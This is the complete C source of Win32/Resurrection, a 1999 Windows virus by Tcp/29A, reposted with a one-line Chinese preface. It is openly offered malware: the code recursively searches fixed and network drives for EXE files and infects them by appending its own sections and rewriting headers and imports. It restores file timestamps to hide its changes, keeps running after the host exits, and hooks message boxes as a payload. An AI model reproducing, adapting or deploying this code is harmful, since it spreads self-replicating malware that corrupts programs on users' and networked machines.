请注意代码非我所有,我相信感兴趣的都能看懂 ^_^
////////////////////////////////////////////////////////////////////
//
// Win32/Resurrection
//
// Coded in late June'99/July'99/[VX vacations]/December'99
//
// (c)1999 Tcp/29A (tcp@cryogen.com)
//
// This is my 1st Windows virus (at last:) and the first coded by
// me in the last 2 years.
//
// It is a PE memory resident appending virus fully written in C.
// I think it's the first virus written in C that doesn't change
// the NewExe pointer.
// It could be also the 1st resident virus for Alpha machines running
// NT. If you can compile and test it in Alpha, please send me a mail.
//
//
// How the virus work?
// - It creates a low priority thread that searchs and infects files.
// - It adds its sections reading them from memory, relocates the
// code/data and fixes the relocs (then the virus needs always
// its own reloc section).
// It imports the host import section, replacing the ExitProcess
// call to ExitThread; then the virus will be the main thread and
// it can continue searching for files even when host has finnished.
// - If the file's last section is the reloc section, the virus
// joins this section with its reloc section so if the file is
// not loaded at its preferred address the system will reloc it
// and the virus.
//
// The virus is called Resurrection because it's my resurrection in
// the VX scene.
// Unfortunately, I hadn't time to code the Resurrection payload:
// using OLE automation and the C:\CLASS.SYS from W97M/Class (or
// the one from Ethan) it could resurrect the virus.
// Then I coded a simple payload that changes the captions in
// MessageBoxes used by the host.
//
// Sorry for the obfuscated C and poorly optimized code, but it
// works (i hope) and, hey, it's a virus :)
//
// This virus is dedicated to Jacky Qwerty, we'll miss you. And to
// 29Aers for don't kicking a lazy and improductive member as I am ;)
//
// Well, now i got another 2 years credit hahaha (not!)
//
// Tcp.
//
////////////////////////////////////////////////////////////////////
/////////////
// Includes
/////////////
#include <stdio.h>
#include <windows.h>
/////////////////////
// Defines
/////////////////////
#define MEMALLOC(x) GlobalAlloc(GPTR, x)
#define MEMFREE(x) GlobalFree(x)
/////////////////////
// Type definitions
/////////////////////
typedef struct
{
WORD RelocOfs : 12;
WORD RelocType: 4;
} IMAGE_RELOCATION_DATA;
////////////
// Globals
////////////
IMAGE_NT_HEADERS PEHeader;
IMAGE_DOS_HEADER * IDosHeader;
IMAGE_NT_HEADERS * IPEHeader;
IMAGE_SECTION_HEADER * ISection;
IMAGE_SECTION_HEADER * Section = NULL;
int Generation = 1;
int VirusSections = 0;
int FirstVirusSection = 0;
int VirusCodeSection = 0;
int VirusImportSection = 0;
DWORD VirusImportSize = 0;
DWORD VirusRVAImports = 0;
DWORD HostRVAImports = 0;
int VirusRelocSection = 0;
DWORD VirusRelocSize = 0;
DWORD VirusRelocSizeDir = 0;
DWORD OfsSections = 0;
DWORD VirusBaseRVA = 0;
DWORD VirusEP = 0;
DWORD HostEP = 0;
//// Fix for Visual C 5.0 heap
//extern __small_block_heap;
//////////////
// Functions
//////////////
/////////////////////////////////////
// GetProcAddress for ordinal imports
/////////////////////////////////////
DWORD GetProcAddressOrd(DWORD Base, DWORD NFunc)
{
IMAGE_NT_HEADERS * DLLHeader;
IMAGE_EXPORT_DIRECTORY * Exports;
DWORD * AddrFunctions;
DLLHeader = (IMAGE_NT_HEADERS *)(Base + ((IMAGE_DOS_HEADER *)Base)->e_lfanew);
Exports = (IMAGE_EXPORT_DIRECTORY *)(Base + DLLHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
AddrFunctions = (DWORD *)(Base + Exports->AddressOfFunctions);
return Base + AddrFunctions[NFunc - Exports->Base];
}
//////////////////////////////////
// Check file and read PE header
//////////////////////////////////
int ReadPEHeader(HANDLE FHandle)//FILE * FHandle)
{
IMAGE_DOS_HEADER FileHeader;
WORD SizeSections;
DWORD BytesRead;
return
( // Read file header
( ReadFile(FHandle, &FileHeader, sizeof(IMAGE_DOS_HEADER), &BytesRead, NULL) )
&&
( BytesRead == sizeof(IMAGE_DOS_HEADER) )
&& // Check if EXE file
( FileHeader.e_magic == IMAGE_DOS_SIGNATURE )
&& // Seek to NewExe header
( SetFilePointer(FHandle, FileHeader.e_lfanew, NULL, FILE_BEGIN) != (DWORD)-1 )
&& // Read header
( ReadFile(FHandle, &PEHeader, sizeof(IMAGE_NT_HEADERS), &BytesRead, NULL) )
&&
( BytesRead == sizeof(IMAGE_NT_HEADERS) )
&& // Check if PE file
( PEHeader.Signature == IMAGE_NT_SIGNATURE )
&& // Alloc memory for file sections + virus sections
( (SizeSections = (PEHeader.FileHeader.NumberOfSections + VirusSections) * sizeof(IMAGE_SECTION_HEADER)) )
&&
( (Section = MEMALLOC(SizeSections)) != NULL )
&&
( (OfsSections = SetFilePointer(FHandle, 0, NULL, FILE_CURRENT)) )
&& // Read PE sections
( ReadFile(FHandle, Section, SizeSections, &BytesRead, NULL) )
&&
( BytesRead == SizeSections )
&& // Check if there is enough room for our sections
( (SetFilePointer(FHandle, 0, NULL, FILE_CURRENT) + (VirusSections * sizeof(IMAGE_SECTION_HEADER))) <= PEHeader.OptionalHeader.SizeOfHeaders )
&& // Only infect when entry point belongs to 1st section
// Avoid reinfections and compressors (usually perform virus checks)
( PEHeader.OptionalHeader.AddressOfEntryPoint < Section[0].VirtualAddress + Section[0].SizeOfRawData )
&& // Skip DDLs
( !(PEHeader.FileHeader.Characteristics & IMAGE_FILE_DLL) )
&& // Skip files with overlays or not aligned to file alignment
( SetFilePointer(FHandle, 0, NULL, FILE_END) == Section[PEHeader.FileHeader.NumberOfSections-1].PointerToRawData + Section[PEHeader.FileHeader.NumberOfSections-1].SizeOfRawData )
&& //Check if the host will overwrite our code with its unitialized data (not present in disk)
( Section[PEHeader.FileHeader.NumberOfSections-1].Misc.VirtualSize <= Section[PEHeader.FileHeader.NumberOfSections-1].SizeOfRawData )
);
}
///////////////////////////////////////
// Translates a RVA into a file offset
///////////////////////////////////////
DWORD RVA2Ofs(DWORD rva)
{
int NSect;
NSect = 0;
while ( NSect < (PEHeader.FileHeader.NumberOfSections - 1) )
{
if ( (Section[NSect].VirtualAddress + Section[NSect].SizeOfRawData) >= rva )
break;
NSect++;
}
return (Section[NSect].PointerToRawData + ( rva - Section[NSect].VirtualAddress ));
}
////////////////////////////////////////////
// I can't remember what this function does
////////////////////////////////////////////
void InfectFile(HANDLE FHandle)
{
BYTE * Relocations = NULL;
BYTE * HostRelocs = NULL;
BYTE * Ptr;
IMAGE_BASE_RELOCATION * RelocBlock;
IMAGE_RELOCATION_DATA * PtrReloc;
int j;
// Let's do some initializations
Section = NULL;
Relocations = NULL;
HostRelocs = NULL;
Ptr = NULL;
if (ReadPEHeader(FHandle))
{
DWORD SectionRVA;
int HostNSections;
DWORD HostRelocsSize;
DWORD BytesRead;
int i;
HostEP = PEHeader.OptionalHeader.AddressOfEntryPoint;
HostNSections = PEHeader.FileHeader.NumberOfSections;
HostRVAImports = PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
// Search for victim import section
for (i=0; i<HostNSections; i++)
{
if (Section[i].VirtualAddress + Section[i].SizeOfRawData > HostRVAImports)
{
// Do it writable
Section[i].Characteristics |= IMAGE_SCN_MEM_WRITE;
break;
}
}
// Check if last section is .reloc
HostRelocsSize = 0;
if (PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress == Section[HostNSections-1].VirtualAddress)
{
// Then we'll join it to virus reloc section
VirusBaseRVA = SectionRVA = Section[HostNSections-1].VirtualAddress;
if ( (HostRelocs = (BYTE *)MEMALLOC((HostRelocsSize = PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size))) == NULL)
{
goto L_Exit_Infect;
}
else // Read the .reloc section
{
HostNSections--;
SetFilePointer(FHandle, Section[HostNSections].PointerToRawData, NULL, FILE_BEGIN);
ReadFile(FHandle, HostRelocs, HostRelocsSize, &BytesRead, NULL);
SetFilePointer(FHandle, Section[HostNSections].PointerToRawData, NULL, FILE_BEGIN);
}
}
else // There is no .reloc or it is not the last section
{
if (PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{ // There are relocs but we didn't find them, so exit
goto L_Exit_Infect;
}
VirusBaseRVA = SectionRVA = PEHeader.OptionalHeader.SizeOfImage;
SetFilePointer(FHandle, 0, NULL, FILE_END);
}
FirstVirusSection = HostNSections;
// Add virus section table
CopyMemory(&Section[HostNSections], &ISection[0], sizeof(IMAGE_SECTION_HEADER) * VirusSections);
// Reloc virus code & fix reloc sections
if ((Relocations = MEMALLOC((VirusRelocSize > 0x1000)? VirusRelocSize : 0x1000)) == NULL) // Minimun a page
{
goto L_Exit_Infect;
}
CopyMemory(Relocations, (BYTE *)((DWORD)IDosHeader + ISection[VirusRelocSection].VirtualAddress + ISection[VirusRelocSection].Misc.VirtualSize - VirusRelocSize), VirusRelocSize);
RelocBlock = (IMAGE_BASE_RELOCATION *)Relocations;
PtrReloc = (IMAGE_RELOCATION_DATA *)(Relocations + sizeof(IMAGE_BASE_RELOCATION));
// Reloc all virus sections and write them to disk
for (i=0; i<VirusSections; i++)
{
DWORD RelocsInBlock;
Section[HostNSections + i].PointerToRawData = SetFilePointer(FHandle, 0, NULL, FILE_CURRENT);
Section[HostNSections + i].VirtualAddress = SectionRVA;
Section[HostNSections + i].SizeOfRawData = (ISection[i].SizeOfRawData + PEHeader.OptionalHeader.FileAlignment-1) & (-(long)PEHeader.OptionalHeader.FileAlignment);
if (i == VirusRelocSection) // Virus reloc section?
{
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress = SectionRVA;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size = HostRelocsSize + VirusRelocSize;
Section[HostNSections + i].Misc.VirtualSize = HostRelocsSize + VirusRelocSize;
Section[HostNSections + i].SizeOfRawData = (HostRelocsSize + VirusRelocSize + (PEHeader.OptionalHeader.FileAlignment - 1)) & (-(long)PEHeader.OptionalHeader.FileAlignment);
// Write host relocations
WriteFile(FHandle, HostRelocs, HostRelocsSize, &BytesRead, NULL);
// Add virus relocations
WriteFile(FHandle, Relocations, VirusRelocSize, &BytesRead, NULL);
// Fill with zeros until file alignment
memset(Relocations, 0, 0x1000);
WriteFile(FHandle, Relocations, Section[HostNSections + i].SizeOfRawData - (HostRelocsSize + VirusRelocSize), &BytesRead, NULL);
}
else
{
if ((Ptr = (BYTE *)MEMALLOC(ISection[i].SizeOfRawData)) == NULL)
{
goto L_Exit_Infect;
}
CopyMemory(Ptr, (BYTE *)((DWORD)IDosHeader + ISection[i].VirtualAddress), ISection[i].SizeOfRawData);
// Patch Visual C 5.0 heap in .data section
/*
{
DWORD * PtrHeap = &__small_block_heap;
if (((DWORD)IDosHeader + ISection[i].VirtualAddress < (DWORD)PtrHeap)
&&
((DWORD)IDosHeader + ISection[i].VirtualAddress + ISection[i].SizeOfRawData > (DWORD)PtrHeap)
)
{
PtrHeap = (DWORD *)(Ptr + (DWORD)PtrHeap - (DWORD)IDosHeader - ISection[i].VirtualAddress);
PtrHeap[3] = PtrHeap[2];
PtrHeap[4] = PtrHeap[5] = (DWORD)-1;
}
}
*/
// Do relocations in this section
while ( (ISection[i].VirtualAddress + ISection[i].SizeOfRawData > RelocBlock->VirtualAddress)
&&
((DWORD)PtrReloc < (DWORD)Relocations + VirusRelocSizeDir)
)
{
DWORD Base;
Base = RelocBlock->VirtualAddress - ISection[i].VirtualAddress;
RelocsInBlock = (RelocBlock->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOCATION_DATA);
while (RelocsInBlock--)
{
if (PtrReloc->RelocType == IMAGE_REL_BASED_HIGHLOW)
{
*((DWORD *)&Ptr[Base + PtrReloc->RelocOfs]) -= (IPEHeader->OptionalHeader.ImageBase + ISection[i].VirtualAddress);//RelocBlock->VirtualAddress);
*((DWORD *)&Ptr[Base + PtrReloc->RelocOfs]) += (PEHeader.OptionalHeader.ImageBase + SectionRVA);
}
PtrReloc++;
}
RelocBlock->VirtualAddress = RelocBlock->VirtualAddress - ISection[i].VirtualAddress + SectionRVA;
RelocBlock = (IMAGE_BASE_RELOCATION *)PtrReloc;
PtrReloc = (IMAGE_RELOCATION_DATA *)((BYTE *)RelocBlock + sizeof(IMAGE_BASE_RELOCATION));
}
// Check if this is the Import section
if (i == VirusImportSection)
{
IMAGE_IMPORT_DESCRIPTOR * Imports;
IMAGE_THUNK_DATA * DataImports;
DWORD StartImports;
DWORD DeltaRVAs;
DeltaRVAs = SectionRVA - ISection[i].VirtualAddress;
StartImports = IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress - ISection[i].VirtualAddress;
Imports = (IMAGE_IMPORT_DESCRIPTOR *)&Ptr[StartImports];
while (Imports->OriginalFirstThunk)
{
// Fix some initialized fields in memory
Imports->TimeDateStamp = Imports->ForwarderChain = 0;
Imports->OriginalFirstThunk += DeltaRVAs;
Imports->Name += DeltaRVAs;
Imports->FirstThunk += DeltaRVAs;
DataImports = (IMAGE_THUNK_DATA *)&Ptr[Imports->OriginalFirstThunk - SectionRVA];
do
{
DataImports->u1.AddressOfData = (IMAGE_IMPORT_BY_NAME *)((DWORD)DataImports->u1.AddressOfData + DeltaRVAs);
}
while ((++DataImports)->u1.AddressOfData);
Imports++;
}
}
WriteFile(FHandle, Ptr, Section[HostNSections + i].SizeOfRawData, &BytesRead, NULL);
MEMFREE(Ptr);
Ptr = NULL;
}
SectionRVA += ( Section[HostNSections + i].Misc.VirtualSize + (PEHeader.OptionalHeader.SectionAlignment - 1)) & (-(long)PEHeader.OptionalHeader.SectionAlignment);
}//for
// Recalculate Header fields
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].VirtualAddress = 0;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].Size = 0;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress = VirusRVAImports + Section[HostNSections + VirusCodeSection].VirtualAddress;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size = IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size;
PEHeader.OptionalHeader.SizeOfImage = SectionRVA;
PEHeader.OptionalHeader.AddressOfEntryPoint = VirusEP + Section[HostNSections + VirusCodeSection].VirtualAddress;
PEHeader.FileHeader.NumberOfSections = HostNSections + VirusSections;
PEHeader.OptionalHeader.SizeOfCode = 0;
PEHeader.OptionalHeader.SizeOfInitializedData = 0;
PEHeader.OptionalHeader.SizeOfUninitializedData = 0;
for (j=0; j<PEHeader.FileHeader.NumberOfSections; j++)
{
if (Section[j].Characteristics & IMAGE_SCN_CNT_CODE)
PEHeader.OptionalHeader.SizeOfCode += Section[j].SizeOfRawData;
if (Section[j].Characteristics & IMAGE_SCN_CNT_INITIALIZED_DATA)
PEHeader.OptionalHeader.SizeOfInitializedData += Section[j].SizeOfRawData;
if (Section[j].Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA)
PEHeader.OptionalHeader.SizeOfUninitializedData += Section[j].SizeOfRawData;
}
// Write new header and section table
SetFilePointer(FHandle, OfsSections - sizeof(IMAGE_NT_HEADERS), NULL, FILE_BEGIN);
WriteFile(FHandle, &PEHeader, sizeof(IMAGE_NT_HEADERS), &BytesRead, NULL);
WriteFile(FHandle, Section, PEHeader.FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER), &BytesRead, NULL);
}
L_Exit_Infect:
// Free allocated memory
if (HostRelocs != NULL)
MEMFREE(HostRelocs);
if (Relocations != NULL)
MEMFREE(Relocations);
if (Section != NULL)
MEMFREE(Section);
if (Ptr != NULL)
MEMFREE(Ptr);
}
///////////////////////////////////////////
// Recursively search for files to infect
///////////////////////////////////////////
void SearchFiles(char * Path)
{
HANDLE FindHandle;
HANDLE FHandle;
WIN32_FIND_DATA FindResult;
FILETIME Time1, Time2, Time3;
if (SetCurrentDirectory(Path))
{
// Search for EXE files in current directory
if ((FindHandle = FindFirstFile("*.EXE", &FindResult)) != INVALID_HANDLE_VALUE)
{
do
{
FHandle = CreateFile(FindResult.cFileName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_ARCHIVE,
NULL
);
if (FHandle != INVALID_HANDLE_VALUE)
{
GetFileTime(FHandle, &Time1, &Time2, &Time3); // Get file time
InfectFile(FHandle); // Infect file
SetFileTime(FHandle, &Time1, &Time2, &Time3); // Restore file time
CloseHandle(FHandle);
}
}
while (FindNextFile(FindHandle, &FindResult));
}
FindClose(FindHandle);
// Now search for subdirectories and process them
if ((FindHandle = FindFirstFile("*", &FindResult)) != INVALID_HANDLE_VALUE)
{
do
{
if (FindResult.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
char * DirName;
DirName = _strupr(_strdup(FindResult.cFileName));
if (
(memcmp(DirName, "SYSTEM", 6)) // Skip SYSTEM??
&&
(FindResult.cFileName[0] != '.') // Skip loops with "." and ".."
)
{
SearchFiles(FindResult.cFileName);
}
free(DirName);
}
}
while (FindNextFile(FindHandle, &FindResult));
}
FindClose(FindHandle);
}
}
/////////////////////////////////////////////
// Search fixed and network drives to infect
/////////////////////////////////////////////
DWORD WINAPI SearchDrives()
{
DWORD Drives;
BYTE CurrentDrive[] = "A:\\";
DWORD DriveType;
BYTE i;
Drives = GetLogicalDrives();
for (i=0; i<sizeof(DWORD); i++)
{
if (Drives & (1<<i)) // Drive present?
{
CurrentDrive[0] = 'A' + i;
DriveType = GetDriveType(CurrentDrive);
// Only infect files in Fixed and Network Drives
if ((DriveType == DRIVE_FIXED) || (DriveType == DRIVE_REMOTE))
{
SearchFiles(CurrentDrive);
}
}
}
return 1;
}
///////////
// Payload
///////////
int MyMessageBox(HWND hWnd, LPSTR Text, LPSTR Caption, UINT Type)
{
char * Msgs[] =
{
"Hey you, stupid",
"Win32/Resurrection by Tcp/29A",
"Warning! Don't close this window",
"I already told you this but..."
};
static int i = 0;
return MessageBoxA(hWnd, Text, Msgs[++i & 3], Type);
}
// Simulated host for 1st generation
void Gen1()
{
MyMessageBox(NULL, "", NULL, MB_OK);
}
// Virus Entry Point
void main()
{
BYTE InfectedFile[_MAX_PATH];
DWORD ThreadID;
DWORD ThreadInfID;
HANDLE HThread;
HANDLE InfThread;
int i;
HMODULE * HandleDLL = NULL;
int ImportedDLLs = 0;
// Get the infected filename
GetModuleFileName(NULL, InfectedFile, sizeof(InfectedFile));
// And its memory address
IDosHeader = (IMAGE_DOS_HEADER *)GetModuleHandle(InfectedFile);
IPEHeader = (IMAGE_NT_HEADERS *)((BYTE *)IDosHeader + IDosHeader->e_lfanew);
if ( IPEHeader->Signature == IMAGE_NT_SIGNATURE ) // Check if we got the PE header
{
// Get ptr to Sections
ISection = (IMAGE_SECTION_HEADER *)((BYTE *)IPEHeader + sizeof(IMAGE_NT_HEADERS));
// Get ptr to virus Sections
ISection += FirstVirusSection;
if (Generation++ == 1)
{ // Make some easy 1st-gen calcs to avoid complex ones in next generations
HostEP = (DWORD)Gen1 - (DWORD)IDosHeader;
VirusSections = IPEHeader->FileHeader.NumberOfSections; // Number of sections
// Get the order of sections
for (i=0; i<VirusSections; i++)
{
if ((ISection[i].VirtualAddress <= IPEHeader->OptionalHeader.AddressOfEntryPoint)
&&
(ISection[i].VirtualAddress + ISection[i].SizeOfRawData > IPEHeader->OptionalHeader.AddressOfEntryPoint)
)
{ // This is the code section
VirusCodeSection = i;
VirusEP = IPEHeader->OptionalHeader.AddressOfEntryPoint - ISection[i].VirtualAddress;
}
else
{
if ((ISection[i].VirtualAddress <= IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress)
&&
(ISection[i].VirtualAddress + ISection[i].SizeOfRawData > IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress)
)
{ // This is the import section
VirusImportSection = i;
VirusRVAImports = IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress - ISection[0].VirtualAddress;
}
else
{
if (ISection[i].VirtualAddress == IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)
{ // This is the reloc section
VirusRelocSection = i;
VirusRelocSize = ISection[i].Misc.VirtualSize;
VirusRelocSizeDir = IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
}
}
}
}//for
}
else // Not first generation
{
IMAGE_IMPORT_DESCRIPTOR * HostImports;
int i;
HostImports = (IMAGE_IMPORT_DESCRIPTOR *)(HostRVAImports + (DWORD)IDosHeader);
// Count imported DLLs
while (HostImports->OriginalFirstThunk)
{
ImportedDLLs++;
HostImports++;
}
HandleDLL = (HMODULE *)MEMALLOC(ImportedDLLs * sizeof(HMODULE));
// Make host imports
HostImports = (IMAGE_IMPORT_DESCRIPTOR *)(HostRVAImports + (DWORD)IDosHeader);
for (i=0; i<ImportedDLLs; i++)
{
DWORD * FunctionName;
DWORD * FunctionAddr;
LPCTSTR Name;
LPCTSTR StExitThread = "ExitThread";
if ((HandleDLL[i] = LoadLibrary((LPCTSTR)(HostImports->Name + (DWORD)IDosHeader))) == NULL)
{ // Exit if not find a DLL
char StError[100];
MEMFREE(HandleDLL);
sprintf(StError, "Can not find %s", (LPCTSTR)(HostImports->Name + (DWORD)IDosHeader));
MessageBox(NULL, StError, "Error initializing program", MB_OK | MB_ICONWARNING);
ExitProcess(0);
}
// Perform host imports
FunctionName = (DWORD *)(HostImports->OriginalFirstThunk + (DWORD)IDosHeader);
FunctionAddr = (DWORD *)(HostImports->FirstThunk + (DWORD)IDosHeader);
while (*FunctionName)
{
if (*FunctionName & IMAGE_ORDINAL_FLAG)
{
// Windows doesn't like ordinal imports from kernel32, so use my own GetProcAddress
*FunctionAddr = GetProcAddressOrd((DWORD)HandleDLL[i], IMAGE_ORDINAL(*FunctionName));
}
else
{
Name = (LPCTSTR)((DWORD)IDosHeader + *FunctionName + 2/*Hint*/);
// Change ExitProcess by ExitThread
if (!strcmp(Name, "ExitProcess"))
Name = StExitThread;
// Set payload
if (!strcmp(Name, "MessageBoxA"))
*FunctionAddr = (DWORD)&MyMessageBox;
else
*FunctionAddr = (DWORD)GetProcAddress(HandleDLL[i], Name);
}
FunctionName++;
FunctionAddr++;
}
HostImports++;
}
}
HostEP += (DWORD)IDosHeader;
// Exec host with a thread
if ((HThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)HostEP, GetCommandLine(), 0, &ThreadID)) != NULL)
{
HANDLE VirusMutex;
// Check if already resident
if ( ((VirusMutex = CreateMutex(NULL, FALSE, "29A")) != NULL)
&&
(GetLastError() != ERROR_ALREADY_EXISTS)
)
{
// Create infection thread
InfThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)SearchDrives , NULL, CREATE_SUSPENDED, &ThreadInfID);
// Assign a low priority
SetThreadPriority(InfThread, THREAD_PRIORITY_IDLE);
// Activate it
ResumeThread(InfThread);
// Wait until infection completed
WaitForSingleObject(InfThread, INFINITE);
ReleaseMutex(VirusMutex);
}
// Wait until host thread finnished
WaitForSingleObject(HThread, INFINITE);
}
for (i=0; i<ImportedDLLs; i++)
{
FreeLibrary(HandleDLL[i]);
}
if (HandleDLL != NULL)
MEMFREE(HandleDLL);
}
}